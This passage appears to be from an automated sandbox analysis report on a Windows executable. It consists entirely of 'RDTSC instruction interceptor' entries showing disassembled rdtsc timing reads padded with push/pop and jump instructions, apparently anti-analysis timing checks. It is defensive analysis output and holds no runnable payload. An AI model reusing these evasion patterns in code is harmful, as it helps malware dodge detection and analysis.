                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8DE4 second address: 5A8DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A91F6 second address: 5A91FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A91FA second address: 5A9200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9200 second address: 5A9213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F55E4D0512Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9213 second address: 5A9219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9219 second address: 5A9229 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D05126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9229 second address: 5A922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A939A second address: 5A93A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93A2 second address: 5A93A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93A6 second address: 5A93AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93AA second address: 5A93BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jns 00007F55E4D1D2D6h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93BC second address: 5A93C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F55E4D05126h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9529 second address: 5A9532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9532 second address: 5A9538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9538 second address: 5A953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96B3 second address: 5A96E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F55E4D05126h 0x00000015 jmp 00007F55E4D05133h 0x0000001a popad 0x0000001b js 00007F55E4D05132h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96E4 second address: 5A971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jo 00007F55E4D1D2D6h 0x00000014 jmp 00007F55E4D1D2DDh 0x00000019 pop eax 0x0000001a jmp 00007F55E4D1D2E9h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A971F second address: 5A973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F55E4D05133h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A973C second address: 5A9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9C8D second address: 5A9C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F55E4D05126h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9C9B second address: 5A9CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9CA0 second address: 5A9CB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F55E4D05126h 0x00000009 jl 00007F55E4D05126h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9CB1 second address: 5A9CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551335 second address: 551343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F55E4D05126h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551343 second address: 551364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DEh 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F55E4D1D2D6h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551364 second address: 55136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55136E second address: 551378 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551378 second address: 55137C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA24F second address: 5AA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F55E4D1D2D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8B05 second address: 5A8B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF7EF second address: 5AF7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF7F3 second address: 5AF810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D05137h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF810 second address: 5AF814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF94B second address: 5AF94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF94F second address: 5AF959 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AFE2F second address: 5AFE38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B03D5 second address: 5B03E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F55E4D1D2DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B03E3 second address: 5B03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B03E7 second address: 5B03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B03ED second address: 5B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B03F3 second address: 5B03F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4DD8 second address: 5B4DDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B3C7C second address: 5B3C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jmp 00007F55E4D1D2DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B3C93 second address: 5B3CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B3CA4 second address: 5B3CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B3CAA second address: 5B3CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F55E4D0512Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571264 second address: 571268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571268 second address: 57126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5718B8 second address: 5718BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571B78 second address: 571B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571B81 second address: 571B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571B87 second address: 571B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 jc 00007F55E4D0512Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571B97 second address: 571BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F55E4D1D2D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571BA7 second address: 571BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5726DD second address: 551335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F55E4D1D2DFh 0x0000000c nop 0x0000000d call dword ptr [ebp+122D2AA7h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F55E4D1D2E4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4097 second address: 5B409F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B409F second address: 5B40A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B40A9 second address: 5B40B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnc 00007F55E4D05126h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B481F second address: 5B482C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F55E4D1D2D8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B482C second address: 5B4838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F55E4D05126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4974 second address: 5B49AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F55E4D1D2E8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B49AD second address: 5B49DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05132h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F55E4D05128h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F55E4D0512Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B76BD second address: 5B76D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e js 00007F55E4D1D2D6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B76D5 second address: 5B76E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F55E4D05126h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B76E2 second address: 5B76F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D1D2DAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B76F4 second address: 5B76F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B76F8 second address: 5B7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B79F3 second address: 5B79F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA130 second address: 5BA15A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D1D2F4h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA15A second address: 5BA15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BA15E second address: 5BA162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BB8BD second address: 5BB8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D05133h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BB8D6 second address: 5BB8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BF344 second address: 5BF351 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BF351 second address: 5BF35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BF35A second address: 5BF381 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F55E4D05132h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F55E4D0512Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BF381 second address: 5BF38B instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C0B12 second address: 5C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C0B18 second address: 5C0B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C6272 second address: 5C6278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 525AD9 second address: 525B15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F55E4D1D2DEh 0x0000000c popad 0x0000000d jng 00007F55E4D1D2DCh 0x00000013 js 00007F55E4D1D2D6h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c je 00007F55E4D1D2E3h 0x00000022 jmp 00007F55E4D1D2DDh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 525B15 second address: 525B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05133h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F55E4D0512Bh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C4FB2 second address: 5C4FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C511F second address: 5C5145 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F55E4D05135h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C5145 second address: 5C515E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D1D2E1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C515E second address: 5C5175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F55E4D05131h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C52E2 second address: 5C52F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F55E4D1D2DEh 0x00000008 jns 00007F55E4D1D2D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57203B second address: 57203F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C5576 second address: 5C557B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9FA7 second address: 5C9FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9FAD second address: 5C9FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA241 second address: 5CA24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F55E4D0512Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA641 second address: 5CA64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA64A second address: 5CA64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CA7BA second address: 5CA7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1F6D second address: 5D1F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05134h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D026C second address: 5D0298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E7h 0x00000008 jmp 00007F55E4D1D2E0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0562 second address: 5D0593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F55E4D05128h 0x0000000c jmp 00007F55E4D05138h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F55E4D05128h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0593 second address: 5D0598 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0AD6 second address: 5D0AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F55E4D0512Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0AEA second address: 5D0AF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
